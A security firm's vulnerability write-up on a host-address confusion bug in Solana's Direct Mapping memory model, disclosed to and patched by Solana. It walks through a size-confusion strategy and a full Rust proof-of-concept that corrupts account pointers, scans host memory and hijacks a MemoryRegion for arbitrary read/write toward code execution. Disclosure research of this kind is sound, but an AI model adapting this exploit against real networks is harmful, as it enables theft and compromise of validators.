1fn update_caller_account_perms( 2 memory_mapping: &MemoryMapping, 3 caller_account: &CallerAccount, 4 callee_account: &BorrowedAccount<'_>, 5 is_loader_deprecated: bool, 6) -> Result<(), Error> { 7 let CallerAccount { 8 original_data_len, 9 vm_data_addr, 10 .. 11 } = caller_account; 12 13 let data_region = account_data_region(memory_mapping, *vm_data_addr, *original_data_len)?; 14 if let Some(region) = data_region { 15 match ( 16 region.state.get(), 17 callee_account.can_data_be_changed().is_ok(), 18 ) { 19 (MemoryState::Readable, true) => { 20 // If the account is still shared it means it wasn't written to yet during this 21 // transaction. We map it as CoW and it'll be copied the first time something 22 // tries to write into it. 23 if callee_account.is_shared() { 24 let index_in_transaction = callee_account.get_index_in_transaction(); 25 region 26 .state 27 .set(MemoryState::Cow(index_in_transaction as u64)); 28 } else { 29 region.state.set(MemoryState::Writable); 30 } 31 } 32 33 (MemoryState::Writable | MemoryState::Cow(_), false) => { 34 region.state.set(MemoryState::Readable); 35 } 36 _ => {} 37 } 38 } 39 let realloc_region = account_realloc_region( 40 memory_mapping, 41 *vm_data_addr, 42 *original_data_len, 43 is_loader_deprecated, 44 )?; 45 if let Some(region) = realloc_region { 46 region 47 .state 48 .set(if callee_account.can_data_be_changed().is_ok() { 49 MemoryState::Writable 50 } else { 51 MemoryState::Readable 52 }); 53 } 54 55 Ok(()) 56}

The idea of the patch is that when a CPI happens, changes to the owner of an account may be updated and flushed to TransactionContext. One example of this is when creating a new token account. The caller is expected to transfer ownership of an empty account to the token program, and the token program will then initialize the token account with relevant data. Obviously we should no longer allow the caller program to directly write the token account data after the token program has taken ownership of it. With Direct Mapping enabled, this means MemoryRegion state must be updated accordingly.

At first glance, the patch seemed unrelated to our finding. But unfortunately, updating state means that while we may point the host pointer of an originally writable MemoryRegion to some unwritable account data, after CPI finishes, the MemoryRegion will just end up being marked as readonly. This kills our exploit.

Still, the vulnerability itself hadn't been patched. We just need to bypass the new checks, and that is exactly what we, Anatomist Security, are best at. With years of deep security research and CTF experience, we specialize in turning dead ends into breakthroughs.

New Exploitation Strategy

So back to the drawing board, what else can we do with our bug? The essence of the bug is confusion of MemoryRegion.host_addr. In other words, we could overwrite an arbitrary MemoryRegion's host_addr with another MemoryRegion's host_addr.

While our first attempt was to change the host_addr of a writable MemoryRegion to some readonly account data buffer, it is definitely not the only way to wield the bug. Our second idea is, instead of trying to write to a readonly account data buffer, what if we changed the host_addr of a writable MemoryRegion to the backing buffer of another writable MemoryRegion that has a different length?

The New Attack Vector: Size Confusion

This new idea led us to a completely different exploitation approach. Instead of trying to bypass permission checks, we could exploit size differences between different account buffers for out-of-bound read/write, a primitive commonly used in binary exploitation.

Consider two accounts, both writable by the attacker:

  • SWAP: A small-sized buffer account with data length 0x100
  • LEVERAGE: A bigger-sized buffer account, with data length 0x400, whose host_addr will be replaced to SWAP's host_addr

If we could make LEVERAGE account's MemoryRegion point to SWAP account's buffer, by accessing LEVERAGE account's virtual memory, we ends up touching SWAP account's data buffer on the host. Since the MemoryRegion of LEVERAGE has a size of 0x400, larger than the size of the underlying host buffer of SWAP, once we go past the first 0x100 bytes of LEVERAGE's virtual memory, it will map beyond the end of the SWAP data buffer. This gives us out-of-bounds read/write primitive on host memory.

From Limited OOB to Arbitrary read/write

With this, we gain out-of-bounds read/write access to 0x300 bytes (0x400 - 0x100) after SWAP's data buffer in host memory. However, this primitive is limited to a specific range. We need to make it more powerful.

The idea is straightforward: since MemoryRegion structures also reside in host memory, we can scan the out-of-bounds region to locate other MemoryRegion structures. By modifying their host_addr fields to point to our target addresses, accessing the corresponding virtual memory provides arbitrary read/write access to those target addresses. We just need to spray a lot of writable accounts and make the size difference larger to increase the success rate.

Proof-of-Concept

Now, let's take a deep dive into a PoC of how to exploit this vulnerability from the ground up.

Detailed Attack Steps

The exploit requires three specific accounts with distinct purposes:

  • SWAP: Small buffer account that serves as the target of the corrupted pointer. Its small buffer will be incorrectly mapped by SWAP's large virtual space.
  • POINTER: Pointer account whose MemoryRegion.host_addr will be rewritten during memory scanning to point to arbitrary memory addresses. This account serves as our pointer pivot to achieve arbitrary read/write capability.
  • LEVERAGE: Large buffer account whose MemoryRegion.host_addr will be hijacked to point to SWAP's smaller buffer, creating the size mismatch for out-of-bounds access.

Step 1: Account Preparation

First, we want to trigger copy-on-write on both LEVERAGE and SWAP accounts and also resize LEVERAGE to 1 byte to make the code path later simpler.

1// Trigger copy-on-write for dedicated buffers 2accounts[leverage_idx].data.borrow_mut()[0] = 1; 3accounts[swap_idx].data.borrow_mut()[0] = 1; 4 5// Resize LEVERAGE to simplify exploit logic 6accounts[leverage_idx].realloc(1, false)?;

Step 2: Fake Pointer Setup

Then we want to overwrite SWAP's AccountInfo.data pointer with LEVERAGE's data pointer. This will cause the runtime to extract LEVERAGE's data address when retrieving SWAP's vm_data_addr during CPI.

1unsafe { 2 ptr::copy( 3 mem::transmute::<&Rc<RefCell<&mut [u8]>>, *const u8>(&accounts[leverage_idx].data), 4 mem::transmute::<&Rc<RefCell<&mut [u8]>>, *mut u8>(&accounts[swap_idx].data), 5 mem::size_of::<Rc<RefCell<&mut [u8]>>>(), 6 ); 7}

Step 3: Vulnerability Trigger via CPI

Now we trigger the flawed update_caller_account() logic by initiating a CPI call doing nothing but with the corrupted SWAP account.

1invoke_signed( 2 &Instruction::new_with_bincode( 3 *program_id, 4 b"", 5 vec![AccountMeta::new(accounts[swap_idx].key.clone(), false)], 6 ), 7 &[accounts[swap_idx].clone()], 8 &[], 9)?;

During this CPI call, the runtime builds a CallerAccount for SWAP using the malformed vm_data_addr. Later when CPI returns, it starts the MemoryRegion update process, but instead of finding SWAP's MemoryRegion, it locates LEVERAGE's MemoryRegion and updates LEVERAGE's MemoryRegion.host_addr to point to SWAP's buffer.

Step 4: Size Mismatch to OOB

Next, we expand LEVERAGE to create the size mismatch.

1// Resize LEVERAGE back to a larger size for memory scanning 2accounts[leverage_idx].realloc(0xa00000, false)?;

So when we access LEVERAGE beyond SWAP's buffer size, we get out-of-bounds access to host memory.

Step 5: Egg Hunting for MemoryRegion

With the out-of-bounds read/write, we can now hunt for the POINTER account's MemoryRegion structure in host memory.

1let leverage_data = accounts[leverage_idx].data.borrow_mut(); 2let mut scan_ptr = leverage_data.as_ptr().add(0x2840); // Start OOB scanning 3 4loop { 5 let check_ptr = scan_ptr as u64; 6 7 // Signature matching for MemoryRegion array 8 if *((check_ptr + 0x18) as *const u64) == 0x000000040020a238 && 9 *((check_ptr + 0x58) as *const u64) == 0x0000000400202908 && 10 *((check_ptr + 0x98) as *const u64) == 0x000000040020f308 && 11 *((check_ptr + 0xd8) as *const u64) == 0x0000000400000000 { 12 // Bingo! 13 ... 14 } 15 ... 16}

We do a really simple signature matching here to locate the POINTER MemoryRegion. Since the VM memory layout is fixed, the pointer fields inside MemoryRegion for specific indices of input accounts are also fixed, so we can just hardcode these VM layout pointers as our signature.

Step 6: Arbitrary R/W via MemoryRegion Hijacking

Once we've successfully hunted down the target MemoryRegion, we can overwrite the POINTER account's MemoryRegion.host_addr and set its state to writable to achieve arbitrary memory access. For example, we can calculate the thread memory base and hijack return addresses with ROP gadgets.

1let thread_mem = (*((data_ptr + 0x48) as *const u64) >> 21) << 21; 2 3// Overwrite POINTER account's backing buffer pointer (arb_ptr) 4*((data_ptr + 0x490) as *mut u64) = thread_mem; 5// Set memory region state to writable 6*((data_ptr + 0x4b8) as *mut u64) = 1;

Final Exploit

Putting them all together, here's the final PoC:

1use std::{ptr, mem, rc::Rc, cell::RefCell}; 2use solana_program::{ 3 account_info::AccountInfo, 4 instruction::{AccountMeta, Instruction}, 5 program::invoke_signed, 6 entrypoint, 7 entrypoint::ProgramResult, 8 pubkey::Pubkey, 9}; 10 11entrypoint!(process_instruction); 12 13// accounts[0]: SWAP account controlled by ATTACKER, owned by this EXPLOIT program. 14// accounts[1]: POINTER account whose MemoryRegion will point to an arbitrary address. 15// accounts[6]: LEVERAGE account controlled by ATTACKER, owned by this EXPLOIT program. 16 17pub fn process_instruction( 18 program_id: &Pubkey, 19 accounts: &[AccountInfo], 20 _instruction_data: &[u8], 21) -> ProgramResult { 22 if accounts.len() == 8 { 23 let swap_idx = 0; 24 let pointer_idx = 1; 25 let leverage_idx = 6; 26 27 // Prepare LEVERAGE and SWAP accounts to set up memory layout 28 accounts[leverage_idx].data.borrow_mut()[0] = 1; 29 accounts[swap_idx].data.borrow_mut()[0] = 1; 30 31 // Resize LEVERAGE to simplify exploit logic 32 accounts[leverage_idx].realloc(1, false)?; 33 34 // Overwrite SWAP's data pointer with LEVERAGE's pointer 35 unsafe { 36 ptr::copy( 37 mem::transmute::<&Rc<RefCell<&mut [u8]>>, *const u8>(&accounts[leverage_idx].data), 38 mem::transmute::<&Rc<RefCell<&mut [u8]>>, *mut u8>(&accounts[swap_idx].data), 39 mem::size_of::<Rc<RefCell<&mut [u8]>>>(), 40 ); 41 } 42 43 // Invoke CPI call to trigger pointer confusion 44 invoke_signed( 45 &Instruction::new_with_bincode( 46 *program_id, 47 b"", 48 vec![AccountMeta::new(accounts[swap_idx].key.clone(), false)], 49 ), 50 &[accounts[swap_idx].clone()], 51 &[], 52 )?; 53 54 // Resize LEVERAGE back to a larger size for memory scanning 55 accounts[leverage_idx].realloc(0xa00000, false)?; 56 57 unsafe { 58 // Scan memory to locate MemoryRegion structure 59 let mut data_ptr = accounts[leverage_idx].data.borrow_mut().as_ptr() as u64 + 0x2840; 60 let arb_ptr = accounts[pointer_idx].data.borrow_mut().as_ptr() as u64; 61 62 loop { 63 // Signature matching to reliably identify MemoryRegion 64 if *((data_ptr + 0x18) as *const u64) == 0x000000040020a238 && 65 *((data_ptr + 0x58) as *const u64) == 0x0000000400202908 && 66 *((data_ptr + 0x98) as *const u64) == 0x000000040020f308 && 67 *((data_ptr + 0xd8) as *const u64) == 0x0000000400000000 { 68 69 let thread_mem = (*((data_ptr + 0x48) as *const u64) >> 21) << 21; 70 71 // Overwrite POINTER account's backing buffer pointer (arb_ptr) 72 *((data_ptr + 0x490) as *mut u64) = thread_mem; 73 // Set memory region state to writable 74 *((data_ptr + 0x4b8) as *mut u64) = 1; 75 76 // At this point, arb_ptr (accounts[pointer_idx]) points to arbitrary memory. 77 // ROP chain setup would occur here (omitted). 78 79 return Ok(()); 80 } 81 82 // Move to next potential MemoryRegion structure 83 data_ptr += (*((data_ptr + 0x08) as *const u64) >> 4) << 4; 84 } 85 } 86 87 // Note: computation budget exhaustion may be necessary in real-world scenarios 88 } 89 90 Ok(()) 91} 92

After successfully getting arbitrary read/write, remote code execution (RCE) would be achievable using traditional binary exploitation tricks.

Notably, the PoCs shown here is no where near stable enough to launch an attack against an active Solana network. Specifically, we haven't implemented account spraying, and also used hardcoded offsets for calculating thread stack and ROPgadgets. However, there are well-established approaches in weaponizing such PoCs into exploits, and we leave this as an exercise for interested readers.

Final Thoughts

As demonstrated, even memory-safe languages like Rust can harbor subtle and powerful vulnerabilities, especially in complex systems utilizing unsafe code to push the boundaries of performance and optimization. What began as a curiosity about Solana’s JIT and memory model evolved into a critical finding that could have compromised the integrity of the entire network.

During our disclosure of the bug to Solana, the team was highly responsive, and also fast to understand the concepts discussed in the report. They also made significant decisions such as putting the Direct Mapping feature on hold for further scrutiny, instead of hastily launching it to meet deadlines. While bugs are inevitable, Solana's professional handling of bug disclosures shows their commitment to security, and demonstrates why it deserves to be a top tier project.

We had a lot of fun exploring this bug. Reading through code, understanding system design at a deep level, and crafting a non-obvious exploit path. These are the kinds of challenges we live for. Hopefully, this write-up sheds light on how the bug hunting process really works. It is not just about the final exploit, but about the twists, dead ends, and intuition that lead there. We hope you enjoyed reading it as much as we enjoyed the journey.

At Anatomist Security, we specialize in uncovering such vulnerabilities through deep technical research and rigorous security audits. If you're building complex software, especially in fast-moving areas like blockchain, and want to ensure its robustness, reach out. We'd love to help.